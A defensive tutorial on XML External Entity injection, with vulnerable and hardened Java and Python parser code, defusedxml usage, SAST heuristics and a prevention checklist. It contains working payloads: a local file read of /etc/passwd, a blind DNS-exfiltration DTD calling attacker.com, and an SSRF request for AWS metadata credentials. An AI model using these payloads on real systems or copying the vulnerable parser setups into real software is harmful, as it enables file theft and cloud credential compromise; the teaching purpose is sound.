XXE Injection (XML External Entity): How It Works and How to Block It

What XXE Is

XML External Entity (XXE) injection is a vulnerability in applications that parse XML input. The XML specification includes a feature called "external entities" — a way to reference content from an external source (a URL or local file path) and include it inline in the document. When an XML parser processes attacker-controlled XML and external entity processing is enabled, the attacker can use this feature to read local files, trigger server-side requests, and in some cases exfiltrate data out of band.

The vulnerability is widespread because many XML parsers process external entities by default; it is not a feature you have to opt into. Developers working with XML rarely think about it: they're focused on parsing the data, not on what the parser does with DOCTYPE declarations.

OWASP history: XXE was its own category (A04) in the OWASP Top 10 2017. In 2021 it was merged into Security Misconfiguration (A05), reflecting that XXE is fundamentally a case of an insecurely configured parser.

How XXE Attacks Work

XML documents can include a DOCTYPE declaration that defines entities — essentially named variables you can reference in the document body. External entities reference content from a URI:

xxe_payload.xml
<?xml version="1.0" encoding="UTF-8"?>
<!-- XXE payload: defines an external entity pointing to a local file -->
<!-- (the XML declaration must come first, so comments go after it) -->
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<root>
  <data>&xxe;</data>
</root>

When an insecure parser processes this, it fetches the contents of /etc/passwd and substitutes it as the value of &xxe;. If the application echoes back the parsed value in the response, the attacker sees the file contents directly.
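The substitution is easy to watch locally without touching a real system. Below is a minimal sketch that assumes Python's standard xml.sax module with its `feature_external_ges` feature deliberately switched on (current Python versions leave it off). A throwaway temp file stands in for /etc/passwd, and the `TextCollector` and `parse_with_external_entities` names are illustrative only:

```python
import io
import tempfile
import xml.sax
from pathlib import Path
from xml.sax.handler import ContentHandler, feature_external_ges


class TextCollector(ContentHandler):
    """Accumulates every chunk of character data the parser reports."""

    def __init__(self):
        super().__init__()
        self.chunks = []

    def characters(self, content):
        self.chunks.append(content)


def parse_with_external_entities(xml_bytes: bytes) -> str:
    parser = xml.sax.make_parser()
    # Deliberately unsafe: re-enable expansion of external general entities
    parser.setFeature(feature_external_ges, True)
    collector = TextCollector()
    parser.setContentHandler(collector)
    parser.parse(io.BytesIO(xml_bytes))
    return "".join(collector.chunks).strip()


# A throwaway file plays the role of /etc/passwd
with tempfile.NamedTemporaryFile("w", suffix=".txt", delete=False) as f:
    f.write("root:x:0:0:root:/root:/bin/bash\n")
secret_path = Path(f.name)

payload = f"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "{secret_path.as_uri()}">
]>
<root><data>&xxe;</data></root>""".encode()

result = parse_with_external_entities(payload)
print(result)  # the temp file's contents, pulled in through &xxe;
secret_path.unlink()
```

The application code never opened the file itself. The parser did so while resolving `&xxe;`, which is why the fix lives in parser configuration.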

Classic File Read Attack

Here's what a vulnerable Java endpoint looks like — and what an attacker sends to it:

XmlProcessor.java (vulnerable)
import java.io.InputStream;
import javax.xml.parsers.*;
import org.w3c.dom.*;

public class XmlProcessor {
    // Vulnerable: the default DocumentBuilderFactory expands external entities
    public Document parseXml(InputStream input) throws Exception {
        DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
        // Missing: feature flags to disallow DOCTYPEs / external entities
        DocumentBuilder db = dbf.newDocumentBuilder();
        return db.parse(input);
    }
}

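vulnerable_parser.py
import io
import xml.sax
from xml.sax.handler import feature_external_ges

from lxml import etree

# Vulnerable: lxml with resolve_entities=True. This was the default before
# lxml 5.0 and is opt-in since; file:// entities get expanded either way
def parse_xml(xml_input: bytes):
    parser = etree.XMLParser(resolve_entities=True)
    return etree.fromstring(xml_input, parser)

# Also vulnerable: xml.sax with external general entities switched on.
# This was the default before Python 3.7.1; newer versions need it enabled
# explicitly, as here. (xml.etree.ElementTree and xml.dom.minidom do not
# expand external entities.)
def parse_xml_sax(xml_input: bytes, handler):
    parser = xml.sax.make_parser()
    parser.setFeature(feature_external_ges, True)
    parser.setContentHandler(handler)
    parser.parse(io.BytesIO(xml_input))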

We've seen this in SOAP services: Legacy Java SOAP endpoints are a hotspot for XXE. The WSDL-generated code often uses the default DocumentBuilderFactory, and nobody has updated it since the service was written in 2012. If your org has old Java web services, they're worth auditing first.

Blind XXE via DNS Exfiltration

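Often the application doesn't echo back the parsed XML, but XXE can still be exploited with out-of-band techniques. The XML specification doesn't allow a parameter-entity reference inside a markup declaration in the internal subset, and parsers such as Xerces and libxml2 reject it. So the payload instead loads an external DTD from a server the attacker controls and lets that DTD build a URL around the stolen data:

blind_xxe.xml
<?xml version="1.0"?>
<!-- Blind XXE: pulls in an attacker-hosted DTD that does the exfiltration -->
<!DOCTYPE foo [
  <!ENTITY % dtd SYSTEM "http://attacker.com/evil.dtd">
  %dtd;
]>
<root><data>test</data></root>

evil.dtd (served from attacker.com)
<!ENTITY % file SYSTEM "file:///etc/hostname">
<!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'http://%file;.attacker.com/'>">
%eval;
%exfil;

The parser fetches evil.dtd and reads /etc/hostname into %file;. It then declares and references %exfil;, whose URL puts the file's contents in the hostname. Before it can request that URL, the server has to resolve the hostname, so the value arrives as a subdomain in a DNS query to the attacker's authoritative nameserver. The attacker just watches their DNS logs. No response body is needed from the app, and the lookup can succeed even where direct outbound HTTP is blocked. The technique suits short, single-line values such as a hostname; multi-line files like /etc/passwd generally can't be smuggled into a hostname this way.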
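The limit on what can leak this way can be shown in a few lines: whatever the file holds has to survive as DNS hostname labels. The rough sketch below uses `exfil_lookup_name`, a hypothetical helper written for illustration. It applies the strict letters-digits-hyphens rule for labels (1 to 63 characters, no leading or trailing hyphen, 253 characters overall) and builds the name that would be looked up. Real parsers and resolvers vary in how strictly they enforce this, including what they do with the trailing newline a file like /etc/hostname usually has.

```python
import re

# One hostname label: letters, digits and hyphens, 1-63 characters,
# not starting or ending with a hyphen
LDH_LABEL = re.compile(r"(?!-)[A-Za-z0-9-]{1,63}(?<!-)")


def exfil_lookup_name(leaked: str, zone: str = "attacker.com"):
    """Return the DNS name resolved for http://<leaked>.<zone>/, or None
    if the leaked value cannot form valid hostname labels."""
    labels = leaked.split(".")
    if not all(LDH_LABEL.fullmatch(label) for label in labels):
        return None
    name = f"{leaked}.{zone}"
    return name if len(name) <= 253 else None


print(exfil_lookup_name("web-01"))                          # web-01.attacker.com
print(exfil_lookup_name("root:x:0:0:root:/root:/bin/bash"))  # None
```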

XXE to SSRF

Instead of using a file:// URL, the attacker can use http:// URLs to trigger server-side requests. This turns XXE into SSRF — the server fetches attacker-specified internal URLs:

xxe_ssrf.xml
<!-- XXE as SSRF — scans internal network / hits metadata service -->
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/">
]>
<root><data>&xxe;</data></root>

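On AWS, this hits the EC2 instance metadata service. That path lists the IAM role attached to the instance, and a second request to /latest/meta-data/iam/security-credentials/<role-name> returns temporary credentials for it. If the application reflects the parsed value in its response, that is a full cloud credential compromise. Instances that enforce IMDSv2 are protected from this particular path, since IMDSv2 only answers requests carrying a session token obtained with a PUT request, which an entity fetch cannot make.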
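Disabling entity processing is the real fix. Still, if an app has to fetch URLs on behalf of XML content at all, an egress check is a useful backstop. Below is a minimal sketch built on Python's standard ipaddress module. `is_internal_target` is a hypothetical helper, not part of any parser API. It treats anything that is not a globally routable address as internal, which covers loopback, RFC 1918 ranges, and the 169.254.0.0/16 link-local range the metadata service lives in. Because it resolves the name separately from the eventual fetch, it remains open to DNS rebinding, so it complements disabling entities rather than replacing it.

```python
import ipaddress
import socket
from urllib.parse import urlsplit


def is_internal_target(url: str) -> bool:
    """True if the URL's host is, or resolves to, a non-public address."""
    host = urlsplit(url).hostname
    if host is None:
        return True  # no host (e.g. file:///...): refuse by default
    try:
        addresses = [ipaddress.ip_address(host)]
    except ValueError:
        # Not an IP literal: resolve it and check every address returned
        try:
            infos = socket.getaddrinfo(host, None)
        except socket.gaierror:
            return True  # unresolvable: refuse by default
        addresses = [ipaddress.ip_address(info[4][0]) for info in infos]
    return any(not addr.is_global for addr in addresses)


print(is_internal_target("http://169.254.169.254/latest/meta-data/"))  # True
print(is_internal_target("http://8.8.8.8/"))                          # False
```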

Which Languages and Parsers Are Vulnerable

External entity processing is a parser-level feature, so the vulnerability depends on which parser you use and how it's configured:

Java: DocumentBuilderFactory, SAXParserFactory, XMLInputFactory — all enable external entities by default
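Python: xml.etree.ElementTree and xml.dom.minidom don't expand external entities; xml.sax stopped expanding them by default in Python 3.7.1 but can be switched back on via feature_external_ges; lxml expanded local-file entities by default before version 5.0 and now only does so when resolve_entities=True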
PHP: simplexml_load_string() and DOMDocument are vulnerable by default when PHP is built against libxml2 older than 2.9.0, and in any version when called with the LIBXML_NOENT flag
Node.js: libxmljs with noent: true is vulnerable; most Node XML parsers are safer by default
.NET: XmlDocument and XmlTextReader are vulnerable by default before .NET Framework 4.5.2, and in later versions when code explicitly assigns an XmlUrlResolver
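Parser defaults are easy to check empirically: feed a known payload to the parser you actually use and see what happens. Below is a minimal sketch for Python's xml.etree.ElementTree, which is documented to raise ParseError (an "undefined entity" error) instead of fetching the file. The helper name is illustrative.

```python
import xml.etree.ElementTree as ET

XXE_PAYLOAD = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<root><data>&xxe;</data></root>"""


def refuses_external_entity(payload: bytes) -> bool:
    """True if ElementTree errors out instead of expanding the entity."""
    try:
        ET.fromstring(payload)
    except ET.ParseError as exc:
        print(f"rejected: {exc}")
        return True
    return False


refuses_external_entity(XXE_PAYLOAD)
```

The same idea works for any parser in the stack: a one-off test with a harmless payload confirms how it is actually configured in your environment, rather than how the documentation says it should be.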

SVG uploads are an XXE vector: SVG files are XML. If your app accepts SVG uploads and parses them server-side (for preview generation, sanitisation, etc.) without disabling external entities, it's vulnerable to XXE from uploaded files. This catches a lot of teams off guard.
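One way to treat SVG uploads as untrusted XML is to refuse any DOCTYPE before the file reaches the real processing pipeline, the Python counterpart of Java's disallow-doctype-decl. Below is a minimal sketch using the standard library's xml.parsers.expat. `check_svg_upload` and `DoctypeForbidden` are hypothetical names. Some drawing tools still emit the SVG 1.1 public DOCTYPE, so a policy this strict may reject some legitimate files.

```python
import xml.parsers.expat


class DoctypeForbidden(ValueError):
    """Raised when an uploaded document carries a DOCTYPE declaration."""


def check_svg_upload(data: bytes) -> None:
    """Parse an upload with expat and reject any DOCTYPE outright.
    Raises DoctypeForbidden, or ExpatError if the XML is malformed."""
    parser = xml.parsers.expat.ParserCreate()

    def forbid_doctype(name, system_id, public_id, has_internal_subset):
        # Fires before any entity in the DOCTYPE can be declared or used
        raise DoctypeForbidden(f"DOCTYPE {name!r} not allowed in uploads")

    parser.StartDoctypeDeclHandler = forbid_doctype
    parser.Parse(data, True)


check_svg_upload(b'<svg xmlns="http://www.w3.org/2000/svg"><rect width="1" height="1"/></svg>')
```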

How to Disable External Entity Processing

XmlProcessor.java (fixed)
import java.io.InputStream;
import javax.xml.parsers.*;
import org.w3c.dom.*;

public class XmlProcessor {
    // Fixed: refuse DOCTYPEs outright; the remaining flags are fallbacks
    // in case DTDs ever have to be re-enabled
    public Document parseXml(InputStream input) throws Exception {
        DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
        dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        dbf.setFeature("http://xml.org/sax/features/external-general-entities", false);
        dbf.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
        dbf.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
        dbf.setXIncludeAware(false);
        dbf.setExpandEntityReferences(false);
        DocumentBuilder db = dbf.newDocumentBuilder();
        return db.parse(input);
    }
}
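The two xml.org feature URIs in the Java fix are standard SAX2 feature names. Python's xml.sax exposes the same URIs as `feature_external_ges` and `feature_external_pes`. Below is a minimal sketch that sets both off explicitly rather than relying on the interpreter default (off since Python 3.7.1). `make_hardened_sax_parser` and `TextCollector` are hypothetical names.

```python
import io
import xml.sax
from xml.sax.handler import (
    ContentHandler,
    feature_external_ges,
    feature_external_pes,
)

# The same SAX2 feature URIs used in the Java setFeature() calls
print(feature_external_ges)  # http://xml.org/sax/features/external-general-entities
print(feature_external_pes)  # http://xml.org/sax/features/external-parameter-entities


class TextCollector(ContentHandler):
    """Accumulates all character data the parser reports."""

    def __init__(self):
        super().__init__()
        self.chunks = []

    def characters(self, content):
        self.chunks.append(content)


def make_hardened_sax_parser(handler: ContentHandler):
    """SAX parser with external entities explicitly disabled."""
    parser = xml.sax.make_parser()
    parser.setFeature(feature_external_ges, False)
    parser.setFeature(feature_external_pes, False)
    parser.setContentHandler(handler)
    return parser


PAYLOAD = b"""<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<root><data>&xxe;</data></root>"""

collector = TextCollector()
make_hardened_sax_parser(collector).parse(io.BytesIO(PAYLOAD))
print(repr("".join(collector.chunks)))  # no file contents: the entity is skipped
```

Setting the flags explicitly documents intent and keeps the code safe if it ever runs on an older interpreter.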

safe_parser.py
from defusedxml import ElementTree
from lxml import etree

# Option 1: defusedxml, a drop-in safe replacement for stdlib XML parsing
def parse_with_defusedxml(xml_input: bytes):
    return ElementTree.fromstring(xml_input)

# Option 2: lxml with entity resolution, network access and DTD loading off
def parse_with_lxml(xml_input: bytes):
    parser = etree.XMLParser(
        resolve_entities=False,
        no_network=True,
        load_dtd=False,
    )
    return etree.fromstring(xml_input, parser)

defusedxml for Python: The defusedxml library wraps Python's XML parsers and, by default, refuses the known entity-based attacks: XXE, billion laughs and quadratic blowup. It provides drop-in replacements for the parsing functions of xml.etree.ElementTree, xml.sax, xml.dom.minidom and others, so in most code you install it and swap the import.
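defusedxml works by hooking the underlying expat parser so that entity declarations and external references raise errors instead of being processed. The sketch below reproduces only the entity-declaration part with the standard library's xml.parsers.expat. It illustrates the idea and is not defusedxml's code; in production the real library is the better choice. `parse_without_entities` and `EntitiesForbidden` are hypothetical names.

```python
import xml.parsers.expat


class EntitiesForbidden(ValueError):
    """Raised when the document declares any entity."""


def parse_without_entities(data: bytes) -> list:
    """Parse with expat, refusing every <!ENTITY> declaration (internal,
    external or unparsed), and return the element names seen."""
    parser = xml.parsers.expat.ParserCreate()
    elements = []

    def forbid_entity_decl(name, is_parameter_entity, value, base,
                           system_id, public_id, notation_name):
        # Raising here stops parsing before the entity can ever be used,
        # which blocks XXE and billion-laughs style expansion alike
        raise EntitiesForbidden(f"entity {name!r} declared")

    parser.EntityDeclHandler = forbid_entity_decl
    parser.StartElementHandler = lambda name, attrs: elements.append(name)
    parser.Parse(data, True)
    return elements


print(parse_without_entities(b"<root><item/></root>"))  # ['root', 'item']
```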

Detecting XXE with SAST

XXE is a good candidate for SAST because the vulnerability is about parser configuration — detectable code patterns rather than runtime behaviour. SAST tools look for:

Use of DocumentBuilderFactory, SAXParserFactory, or XMLInputFactory without the hardening feature flags
xml.sax.parseString() or xml.dom.minidom.parseString() calls without defusedxml
PHP's simplexml_load_string() or DOMDocument->loadXML() called with the LIBXML_NOENT flag (which, despite its name, turns entity substitution on) or LIBXML_DTDLOAD
SVG or document upload handling that routes to XML parsing without validation
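Real SAST engines track each factory object through data flow. The sketch below is only a crude, file-level approximation of the first rule in that list, useful for a quick first pass over a legacy codebase. It flags Java files that create a DocumentBuilderFactory, SAXParserFactory or XMLInputFactory but never mention a common hardening setting. The function names and marker list are illustrative assumptions, and a file that hardens one factory but not another will slip through.

```python
import re
from pathlib import Path

# Factory creation calls that yield an XXE-capable parser by default
FACTORY_CALL = re.compile(
    r"\b(?:DocumentBuilderFactory|SAXParserFactory|XMLInputFactory)\s*\.\s*"
    r"new(?:Default)?(?:Instance|Factory)\s*\("
)

# Strings whose presence suggests someone hardened the factory
HARDENING_MARKERS = (
    "disallow-doctype-decl",
    "external-general-entities",
    "ACCESS_EXTERNAL_DTD",
    "SUPPORT_DTD",
    "IS_SUPPORTING_EXTERNAL_ENTITIES",
)


def looks_unhardened(java_source: str) -> bool:
    """True if the source creates an XML parser factory but never mentions
    any hardening setting. File-level heuristic only."""
    if not FACTORY_CALL.search(java_source):
        return False
    return not any(marker in java_source for marker in HARDENING_MARKERS)


def scan_tree(root: str):
    """Yield .java files under root that look unhardened."""
    for path in Path(root).rglob("*.java"):
        if looks_unhardened(path.read_text(errors="replace")):
            yield path
```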

Prevention Checklist

Disable DOCTYPE declarations entirely — if your XML doesn't use DTDs, block them at the parser level
Disable external general and parameter entities — use the feature flags for your language's parser
Use defusedxml in Python, which blocks the known entity-based attacks without per-parser configuration
Use simpler data formats — if JSON works for your use case, use JSON; it doesn't have this class of problem
Treat SVG uploads as XML — parse them with a hardened parser or sanitise server-side
Run SAST in CI — catch unsafe parser instantiation before code ships
Network-level controls as defence in depth — block outbound HTTP/DNS from app servers where possible to limit out-of-band exfiltration
